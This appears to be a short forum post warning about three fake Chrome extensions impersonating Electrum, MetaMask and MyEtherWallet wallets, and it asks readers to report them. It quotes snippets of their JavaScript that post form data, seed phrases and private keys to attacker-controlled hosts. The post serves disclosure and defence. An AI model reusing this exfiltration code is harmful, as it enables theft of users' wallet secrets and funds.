What is up with the hackers lately? Well they are not resting even in this lock-down. New find:
1. Fake ElectrumExtension:https://chrome.google.com/webstore/detail/electrum/gpffceikmehgifkjjginoibpceadefih
The posting it to:
https://completssl.com/ssnd_el.php
Snippet of loader.js
$.post("https://completssl.com/ssnd_el.php",$("#form").serialize(),function(result){
$('#success-msg').show();
$('#started').hide();
$('#form').hide();
$('#main').hide();
$('#foo').fadeOut().delay(2000).fadeIn();
$('#boo').fadeIn().delay(1200).fadeOut();
});
return false;
2. Fake Meta MaskExtension:https://chrome.google.com/webstore/detail/meta%C2%AD%C2%ADmask-wallet/jbfponbaiamgjmfpfghcjjhddjdjdpna
snippet of loader.js.
$.ajax({
url : 'https://coinomibeta.online/post/connexion.php',
type : 'Post',
data: {
phra: privat,
},
dataType : 'html',
success : function(code_html, statut){
if (x == 1){
location.href = "./final.html";
3. Fake MEW (MyEtherWallet)Extension:https://chrome.google.com/webstore/detail/mew%C2%AD%C2%AD-wallet/njhfmnfcoffkdjbgpannpgifnbgdihkl
snippet of privat.js
$.ajax({
url : 'https://coinomibeta.online/post/connexion.php',
type : 'Post',
data: {
priv: privat,
},
dataType : 'html',
success : function(code_html, statut){
if (x == 1){
location.href = "./final.html";
Probably the same bad actor involved here. Please, kindly report. Thanks.